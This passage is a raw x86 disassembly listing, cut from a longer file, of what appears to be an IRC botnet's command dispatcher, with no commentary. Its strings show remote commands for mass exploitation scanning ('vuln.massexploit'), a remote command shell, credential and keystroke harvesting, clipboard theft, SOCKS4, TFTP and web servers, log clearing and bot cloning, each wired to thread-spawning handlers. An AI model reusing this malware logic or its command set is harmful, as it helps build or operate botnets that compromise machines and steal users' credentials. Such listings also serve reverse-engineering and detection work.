push offset aSend_0 ; "SEND"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D693
cmp [ebp+var_A4], ebx
jz loc_40D669
push [ebp+esi+var_8C]
mov edi, offset aS_1 ; "%s"
lea eax, [ebp+var_844]
push edi
push eax
call sub_415316
push [ebp+esi+var_88]
lea eax, [ebp+var_858]
push edi
push eax
call sub_415316
push [ebp+esi+var_84]
call sub_41587F
mov [ebp+var_6C0], eax
mov eax, [ebp+arg_4]
mov [ebp+var_860], eax
lea eax, [ebp+var_C0]
push 7Fh
push eax
lea eax, [ebp+var_740]
push eax
call sub_416BE0
mov eax, [ebp+var_4]
mov [ebp+var_6B8], eax
mov eax, [ebp+var_8]
mov [ebp+var_6B4], eax
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_844]
push eax
lea eax, [ebp+var_2D8]
push offset dword_436A88
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 12h
push eax
call sub_414DDA
add esp, 44h
mov [ebp+var_6BC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40B9BC
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_6BC]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jz loc_411406
jmp loc_40D65F
; ---------------------------------------------------------------------------
loc_40D4E2: ; CODE XREF: sub_40CD3A+63F�j
; sub_40CD3A+655�j
push [ebp+var_90]
push edi
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40D4FB
mov [ebp+var_4], 1
loc_40D4FB: ; CODE XREF: sub_40CD3A+7B8�j
cmp [ebp+var_8C], ebx
jz loc_40D18F
push (offset loc_426447+1)
push [ebp+var_8C]
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jz short loc_40D522
cmp [ebp+var_4], ebx
jz short loc_40D52E
loc_40D522: ; CODE XREF: sub_40CD3A+7E1�j
lea eax, [ebp+var_C0]
mov [ebp+var_8C], eax
loc_40D52E: ; CODE XREF: sub_40CD3A+7E6�j
cmp [ebp+var_88], ebx
jz loc_40D18F
inc [ebp+var_88]
jz short loc_40D578
cmp [ebp+arg_10], ebx
jz short loc_40D578
lea eax, [ebp+var_43C]
push eax
call sub_415B10
push eax
lea eax, [ebp+var_43C]
push [ebp+var_88]
push eax
call sub_416D70
add esp, 10h
neg eax
sbb eax, eax
add eax, 4
mov [ebp+var_A8], eax
jmp short loc_40D57E
; ---------------------------------------------------------------------------
loc_40D578: ; CODE XREF: sub_40CD3A+806�j
; sub_40CD3A+80B�j
mov eax, [ebp+var_A8]
loc_40D57E: ; CODE XREF: sub_40CD3A+83C�j
mov esi, eax
shl esi, 2
mov edi, [ebp+esi+var_94]
cmp edi, ebx
jz loc_40D18F
push edi
push offset dword_436A7C
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D3B1
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz short loc_40D618
mov eax, dword_46B004
mov eax, off_42C32C[eax*4]
cmp [eax], bl
jz short loc_40D618
push eax
push ecx
push offset dword_436A60
push [ebp+arg_4]
call sub_412B8B
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_2D8]
push offset aSHasJustVersio ; "%s has just versioned me."
push eax
call sub_415316
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
add esp, 20h
cmp [ebp+var_A4], ebx
jnz loc_40D18F
push ebx
lea eax, [ebp+var_2D8]
push 1
push eax
push offset dword_46AF14
jmp loc_411FD7
; ---------------------------------------------------------------------------
loc_40D618: ; CODE XREF: sub_40CD3A+876�j
; sub_40CD3A+886�j
push edi
push offset dword_436A3C
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D3B1
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz loc_40D3B1
mov eax, [ebp+var_8C]
cmp byte ptr [eax], 23h
jz loc_40D3B1
push esi
push eax
push offset dword_436A24
jmp loc_40D0DB
; ---------------------------------------------------------------------------
loc_40D657: ; CODE XREF: sub_40CD3A+92B�j
push 32h
call dword_421060 ; Sleep
loc_40D65F: ; CODE XREF: sub_40CD3A+7A3�j
cmp [ebp+var_6B0], ebx
jz short loc_40D657
jmp short loc_40D68B
; ---------------------------------------------------------------------------
loc_40D669: ; CODE XREF: sub_40CD3A+6C4�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_2D8]
push [ebp+esi+var_8C]
push offset dword_4369D0
push eax
call sub_415316
add esp, 10h
loc_40D68B: ; CODE XREF: sub_40CD3A+92D�j
; sub_40CD3A+A6A�j ...
xor esi, esi
inc esi
jmp loc_40F54A
; ---------------------------------------------------------------------------
loc_40D693: ; CODE XREF: sub_40CD3A+6B8�j
push [ebp+esi+var_90]
push offset aChat ; "CHAT"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40D7E1
cmp [ebp+var_A4], ebx
jz loc_40D7BA
push 13h
call sub_41501C
test eax, eax
pop ecx
jnz loc_40D7A9
push [ebp+esi+var_88]
lea eax, [ebp+var_858]
push offset aS_1 ; "%s"
push eax
call sub_415316
push [ebp+esi+var_84]
call sub_41587F
mov [ebp+var_6C0], eax
mov eax, [ebp+arg_4]
mov [ebp+var_860], eax
lea eax, [ebp+var_C0]
push 7Fh
push eax
lea eax, [ebp+var_740]
push eax
call sub_416BE0
mov eax, [ebp+var_4]
mov [ebp+var_6B8], eax
mov eax, [ebp+var_8]
mov [ebp+var_6B4], eax
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_2D8]
push offset dword_436990
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 13h
push eax
call sub_414DDA
add esp, 34h
mov [ebp+var_6BC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40B459
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_6BC]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_40D79C
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset dword_436948
jmp loc_4108F0
; ---------------------------------------------------------------------------
loc_40D794: ; CODE XREF: sub_40CD3A+A68�j
push 32h
call dword_421060 ; Sleep
loc_40D79C: ; CODE XREF: sub_40CD3A+A47�j
cmp [ebp+var_6B0], ebx
jz short loc_40D794
jmp loc_40D68B
; ---------------------------------------------------------------------------
loc_40D7A9: ; CODE XREF: sub_40CD3A+98A�j
lea eax, [ebp+var_C0]
push eax
push offset dword_436900
jmp loc_4108F0
; ---------------------------------------------------------------------------
loc_40D7BA: ; CODE XREF: sub_40CD3A+97A�j
lea eax, [ebp+var_C0]
push eax
push offset dword_4368B8
jmp loc_4108F0
; ---------------------------------------------------------------------------
loc_40D7CB: ; CODE XREF: sub_40CD3A+69D�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_42C258
mov [edi], ecx
jnz loc_40D18F
loc_40D7E1: ; CODE XREF: sub_40CD3A+96E�j
mov edi, [edi]
push edi
push offset aNewshit ; "newshit"
mov [ebp+arg_8], edi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412820
push edi
push offset aHi_0 ; "hi"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412820
cmp [ebp+var_A4], ebx
jnz short loc_40D832
push [ebp+var_90]
push offset dword_436AD8
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_412818
loc_40D832: ; CODE XREF: sub_40CD3A+ADC�j
cmp [ebp+arg_28], ebx
jnz loc_412818
xor edi, edi
cmp dword_42EA3C, ebx
jle loc_40D9D6
mov [ebp+arg_20], offset dword_440E18
loc_40D850: ; CODE XREF: sub_40CD3A+B35�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40D876
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword_42EA3C
jl short loc_40D850
jmp loc_40D9D6
; ---------------------------------------------------------------------------
loc_40D876: ; CODE XREF: sub_40CD3A+B25�j
push offset asc_436BF4 ; " :"
push [ebp+arg_0]
call sub_4158E0
pop ecx
cmp eax, ebx
pop ecx
jz loc_40D18F
mov cl, byte_42C258
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_42C258
mov [eax+3], cl
lea ecx, dword_440E30[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_416BE0
lea eax, dword_440E18[edi]
add esp, 0Ch
mov [ebp+arg_8], 0Fh
mov [ebp+arg_20], eax
lea edi, [ebp+esi+var_54]
loc_40D8D1: ; CODE XREF: sub_40CD3A+C31�j
push [ebp+arg_8]
lea eax, [ebp+var_A0]
push offset aD_1 ; "$%d-"
push eax
call sub_415316
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4158E0
add esp, 14h
test eax, eax
jz short loc_40D933
cmp [edi], ebx
jz short loc_40D937
push [ebp+arg_20]
call sub_415B10
add [ebp+var_C], eax
pop ecx
jz short loc_40D962
push dword ptr [edi-4]
push [ebp+var_C]
call sub_4158E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40D962
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4098D4
add esp, 0Ch
jmp short loc_40D962
; ---------------------------------------------------------------------------
loc_40D933: ; CODE XREF: sub_40CD3A+BBF�j
cmp [edi], ebx
jnz short loc_40D962
loc_40D937: ; CODE XREF: sub_40CD3A+BC3�j
lea eax, [ebp+var_A0]
push 2
push eax
lea eax, [ebp+var_14]
push eax
call sub_416BE0
lea eax, [ebp+var_14]
mov [ebp+var_12], bl
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4098D4
add esp, 18h
loc_40D962: ; CODE XREF: sub_40CD3A+BD1�j
; sub_40CD3A+BE2�j ...
dec [ebp+arg_8]
sub edi, 4
cmp [ebp+arg_8], ebx
jg loc_40D8D1
lea eax, [ebp+esi+var_54]
mov [ebp+arg_8], 10h
mov edi, eax
loc_40D97E: ; CODE XREF: sub_40CD3A+C90�j
push [ebp+arg_8]
lea eax, [ebp+var_A0]
push offset aD_0 ; "$%d"
push eax
call sub_415316
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4158E0
add esp, 14h
test eax, eax
jz short loc_40D9C1
mov eax, [edi]
cmp eax, ebx
jz short loc_40D9C1
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4098D4
add esp, 0Ch
loc_40D9C1: ; CODE XREF: sub_40CD3A+C6C�j
; sub_40CD3A+C72�j
dec [ebp+arg_8]
sub edi, 4
cmp [ebp+arg_8], ebx
jg short loc_40D97E
mov [ebp+var_D8], 1
loc_40D9D6: ; CODE XREF: sub_40CD3A+B09�j
; sub_40CD3A+B37�j
lea eax, [ebp+esi+var_94]
mov edi, [eax]
mov cl, [edi]
cmp cl, byte_42C258
jz short loc_40D9F5
cmp [ebp+var_D8], ebx
jz loc_40DBD5
loc_40D9F5: ; CODE XREF: sub_40CD3A+CAD�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe_0 ; "$me"
push edi
call sub_4098D4
lea eax, [ebp+var_C0]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_4098D4
push [ebp+var_8C]
push offset aChan ; "$chan"
push edi
call sub_4098D4
push ebx
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_414278
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_4098D4
add esp, 40h
push [ebp+arg_14]
push offset aServer_2 ; "$server"
push edi
call sub_4098D4
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_4158E0
add esp, 14h
jmp loc_40DB50
; ---------------------------------------------------------------------------
loc_40DA6C: ; CODE XREF: sub_40CD3A+E18�j
push edi
push [ebp+arg_0]
call sub_4158E0
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_A0]
push eax
call sub_416BE0
lea eax, [ebp+var_A0]
push offset asc_43686C ; ")"
push eax
call sub_416B3F
add esp, 1Ch
cmp [ebp+var_A0], 30h
jl short loc_40DAB0
cmp [ebp+var_A0], 39h
jle short loc_40DAC6
loc_40DAB0: ; CODE XREF: sub_40CD3A+D6B�j
push 3
lea eax, [ebp+var_A0]
push offset a63 ; "63"
push eax
call sub_416BE0
add esp, 0Ch
loc_40DAC6: ; CODE XREF: sub_40CD3A+D74�j
lea eax, [ebp+var_A0]
push eax
call sub_41587F
test eax, eax
pop ecx
jle short loc_40DAE9
lea eax, [ebp+var_A0]
push eax
call sub_41587F
pop ecx
mov [ebp+var_14], al
jmp short loc_40DAFA
; ---------------------------------------------------------------------------
loc_40DAE9: ; CODE XREF: sub_40CD3A+D9B�j
call sub_415372
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_14], dl
loc_40DAFA: ; CODE XREF: sub_40CD3A+DAD�j
lea eax, [ebp+var_A0]
mov [ebp+var_13], bl
push eax
call sub_415B10
mov [ebp+arg_8], eax
push 0Ch
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_415390
mov eax, [ebp+arg_8]
add eax, 6
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_10]
push eax
call sub_416BE0
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4098D4
push edi
push [ebp+arg_0]
call sub_4158E0
add esp, 30h
loc_40DB50: ; CODE XREF: sub_40CD3A+D2D�j
test eax, eax
jnz loc_40DA6C
mov edi, 1FFh
lea eax, [ebp+var_21D4]
push edi
push [ebp+arg_0]
push eax
call sub_416BE0
lea eax, [ebp+var_21D4]
push edi
push eax
lea eax, [ebp+var_23D4]
push eax
call sub_416BE0
mov edi, offset asc_426A34 ; " "
lea eax, [ebp+var_23D4]
push edi
push eax
call sub_416B3F
add esp, 20h
mov [ebp+var_94], eax
mov [ebp+arg_10], 1
loc_40DBA3: ; CODE XREF: sub_40CD3A+E83�j
push edi
push ebx
call sub_416B3F
pop ecx
pop ecx
mov ecx, [ebp+arg_10]
inc [ebp+arg_10]
cmp [ebp+arg_10], 20h
mov [ebp+ecx*4+var_94], eax
jl short loc_40DBA3
lea eax, [ebp+esi+var_94]
mov ecx, [eax]
cmp ecx, ebx
jz loc_40D18F
add ecx, 3
mov [eax], ecx
loc_40DBD5: ; CODE XREF: sub_40CD3A+CB5�j
mov edi, [eax]
push edi
push offset aEnz_rndnick ; "enz.rndnick"
mov [ebp+arg_8], edi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4127CB
push edi
push offset aEnz_rn ; "enz.rn"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4127CB
push edi
push offset aEnz_endsess ; "enz.endsess"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4127A9
push edi
push offset aEnz_d ; "enz.d"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4127A9
push edi
push offset aEnz_logout ; "enz.logout"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41270B
push edi
push offset aEnz_lo ; "enz.lo"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41270B
push edi
push offset aEnz_version ; "enz.version"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4126FC
push edi
push offset aEnz_ver ; "enz.ver"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4126FC
push edi
push offset aLockdown_on ; "lockdown.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4125FF
push edi
push offset aLd_on ; "ld.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4125FF
push edi
push offset aLockdown_off ; "lockdown.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4125FF
push edi
push offset aLd_off ; "ld.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4125FF
push edi
push offset aServer_socks4_ ; "server.socks4.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4124DE
push edi
push offset aServer_s4_on ; "server.s4.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4124DE
push edi
push offset aServer_socks_0 ; "server.socks4.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DD29
push [ebp+esi+var_90]
push 11h
push offset aServer ; "Server"
push offset dword_43679C
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DD29: ; CODE XREF: sub_40CD3A+FD5�j
push edi
push offset aServer_rlogin_ ; "server.rlogin.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DD52
push [ebp+esi+var_90]
push 6
push offset aServer ; "Server"
push offset dword_436778
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DD52: ; CODE XREF: sub_40CD3A+FFE�j
push edi
push offset dword_436768
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DD7B
push [ebp+esi+var_90]
push 3
push offset aServer ; "Server"
push offset dword_43675C
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DD7B: ; CODE XREF: sub_40CD3A+1027�j
push edi
push offset dword_436754
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DDA4
push [ebp+esi+var_90]
push 1Ch
push offset dword_436748
push offset dword_43673C
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DDA4: ; CODE XREF: sub_40CD3A+1050�j
push edi
push offset aServer_redirec ; "server.redirect.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DDCD
push [ebp+esi+var_90]
push 10h
push offset dword_436718
push offset dword_436708
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DDCD: ; CODE XREF: sub_40CD3A+1079�j
push edi
push offset dword_4366FC
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DDF6
push [ebp+esi+var_90]
push 0Ah
push offset dword_4366F0
push offset dword_4366E4
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DDF6: ; CODE XREF: sub_40CD3A+10A2�j
push edi
push offset dword_4366D4
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DE1F
push [ebp+esi+var_90]
push 0Bh
push offset dword_4366C8
push offset dword_4366BC
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DE1F: ; CODE XREF: sub_40CD3A+10CB�j
push edi
push offset dword_4366AC
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DE48
push [ebp+esi+var_90]
push 0Fh
push offset dword_4366A0
push offset dword_436694
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DE48: ; CODE XREF: sub_40CD3A+10F4�j
push edi
push offset dword_436684
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DE71
push [ebp+esi+var_90]
push 0Eh
push offset dword_436678
push offset dword_43666C
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DE71: ; CODE XREF: sub_40CD3A+111D�j
push edi
push offset aServer_tftp_of ; "server.tftp.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DE9A
push [ebp+esi+var_90]
push 4
push offset aServer ; "Server"
push offset dword_436650
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DE9A: ; CODE XREF: sub_40CD3A+1146�j
push edi
push offset aBox_findfile_o ; "box.findfile.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4124AF
push edi
push offset aBox_ff_off ; "box.ff.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4124AF
push edi
push offset aBox_procs_off ; "box.procs.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41249A
push edi
push offset aBox_ps_off ; "box.ps.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41249A
push edi
push offset aClone_off ; "clone.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DF17
push [ebp+esi+var_90]
push 17h
push offset aClone ; "Clone"
push offset dword_4365F0
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DF17: ; CODE XREF: sub_40CD3A+11C3�j
push edi
push offset aLockdown_stop ; "lockdown.stop"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DF40
push [ebp+esi+var_90]
push 19h
push offset aSecure_0 ; "Secure"
push offset dword_4365C8
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DF40: ; CODE XREF: sub_40CD3A+11EC�j
push edi
push offset aVuln_stop ; "vuln.stop"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40DF69
push [ebp+esi+var_90]
push 8
push offset aScan ; "Scan"
push offset aExploitation ; "Exploitation"
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40DF69: ; CODE XREF: sub_40CD3A+1215�j
push edi
push offset aVuln_stats ; "vuln.stats"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412481
push edi
push offset aVuln_st ; "vuln.st"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412481
push edi
push offset aEnz_reh4sh ; "enz.reh4sh"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412460
push edi
push offset aEnz_rh4 ; "enz.rh4"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412460
push edi
push offset aEnz_endt3rm ; "enz.endt3rm"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41243E
push edi
push offset aEnz_et3 ; "enz.et3"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41243E
push edi
push offset aEnz_t3rm1nate ; "enz.t3rm1nate"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4123F5
push edi
push offset aEnz_t3rm1 ; "enz.t3rm1"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4123F5
push edi
push offset aEnz_status ; "enz.status"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4123B7
push edi
push offset aEnz_s ; "enz.s"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4123B7
push edi
push offset aEnz_id ; "enz.id"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412380
push edi
push offset aEnz_i ; "enz.i"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412380
push edi
push offset aBox_rebewt ; "box.rebewt"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40E0B7
call sub_409D12
test eax, eax
mov eax, offset dword_4364EC
jnz short loc_40E089
mov eax, offset dword_4364B4
loc_40E089: ; CODE XREF: sub_40CD3A+1348�j
push eax
lea eax, [ebp+var_2D8]
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 1Ch
jmp loc_40D68B
; ---------------------------------------------------------------------------
loc_40E0B7: ; CODE XREF: sub_40CD3A+133A�j
push edi
push offset aThreads_list ; "threads.list"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4122A2
push edi
push offset aThreads_l ; "threads.l"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4122A2
push edi
push offset aEnz_aliases ; "enz.aliases"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41227F
push edi
push offset aEnz_al ; "enz.al"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41227F
push edi
push offset aEnz_log ; "enz.log"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412190
push edi
push offset aEnz_lg ; "enz.lg"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412190
push edi
push offset aUtil_clearlog ; "util.clearlog"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412174
push edi
push offset aUtil_clg ; "util.clg"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_412174
push edi
push offset aBox_netinfo ; "box.netinfo"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41213A
push edi
push offset aBox_ni ; "box.ni"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41213A
push edi
push offset aBox_sysinfo ; "box.sysinfo"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41210F
push edi
push offset aBox_si ; "box.si"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41210F
push edi
push offset aEnz_beg0ne ; "enz.beg0ne"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4120D5
push edi
push offset aEnz_b3g ; "enz.b3g"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4120D5
push edi
push offset aBox_procs ; "box.procs"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411FB3
push edi
push offset aBox_ps ; "box.ps"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411FB3
push edi
push offset aBox_harvest ; "box.harvest"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411F89
push edi
push offset aBox_key ; "box.key"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411F89
push edi
push offset aBox_uptime ; "box.uptime"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411F02
push edi
push offset aBox_up ; "box.up"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411F02
push edi
push offset aBox_driveinfo ; "box.driveinfo"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411EE5
push edi
push offset aBox_drv ; "box.drv"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411EE5
push edi
push offset aBox_testdlls ; "box.testdlls"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411ECC
push edi
push offset aBox_dll ; "box.dll"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411ECC
push edi
push offset aBox_opencmd ; "box.opencmd"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411E85
push edi
push offset aBox_ocmd ; "box.ocmd"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411E85
push edi
push offset aBox_ocmd_off ; "box.ocmd.off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40E302
push [ebp+esi+var_90]
push 7
push offset aRemoteShell ; "Remote shell"
push offset aCmd ; "[CMD]"
jmp loc_4124C2
; ---------------------------------------------------------------------------
loc_40E302: ; CODE XREF: sub_40CD3A+15AE�j
push edi
push offset aEnz_who ; "enz.who"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40E389
cmp [ebp+var_8], ebx
jnz short loc_40E332
push ebx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_40E332: ; CODE XREF: sub_40CD3A+15DC�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40E337: ; CODE XREF: sub_40CD3A+1643�j
cmp [edi], bl
lea eax, [edi+1]
jnz short loc_40E343
mov eax, offset aEmpty ; "<Empty>"
loc_40E343: ; CODE XREF: sub_40CD3A+1602�j
push eax
push esi
lea eax, [ebp+var_2D8]
push offset aD_S ; "%d. %s"
push eax
call sub_415316
push 1
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40E337
push offset dword_436314
jmp loc_41123A
; ---------------------------------------------------------------------------
loc_40E389: ; CODE XREF: sub_40CD3A+15D7�j
push edi
push offset aBox_getclip ; "box.getclip"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411E44
push edi
push offset aBox_gc ; "box.gc"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411E44
push edi
push offset aUtil_flusharp ; "util.flusharp"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411E19
push edi
push offset aUtil_farp ; "util.farp"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411E19
push edi
push offset aUtil_flushdns ; "util.flushdns"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411DE9
push edi
push offset aUtil_fdns ; "util.fdns"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411DE9
push edi
push offset aVuln_currentip ; "vuln.currentip"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411DAF
push edi
push offset aVuln_cip ; "vuln.cip"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411DAF
push edi
push offset aServer_httpd_o ; "server.httpd.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411C15
push edi
push offset aServer_web_on ; "server.web.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411C15
push edi
push offset aServer_tftp_on ; "server.tftp.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411ADD
push edi
push offset aServer_tf_on ; "server.tf.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411ADD
push edi
push offset aVuln_massexplo ; "vuln.massexploit"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4117DE
push edi
push offset aVall ; "vall"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4117DE
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz loc_40D18F
push [ebp+arg_8]
push offset aEnz_nick ; "enz.nick"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4117BD
push [ebp+arg_8]
push offset aEnz_n ; "enz.n"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4117BD
push [ebp+arg_8]
push offset aEnz_join ; "enz.join"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41179D
push [ebp+arg_8]
push offset aEnz_j ; "enz.j"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41179D
push [ebp+arg_8]
push offset aEnz_part ; "enz.part"
call sub_415730
pop ecx
test eax, eax
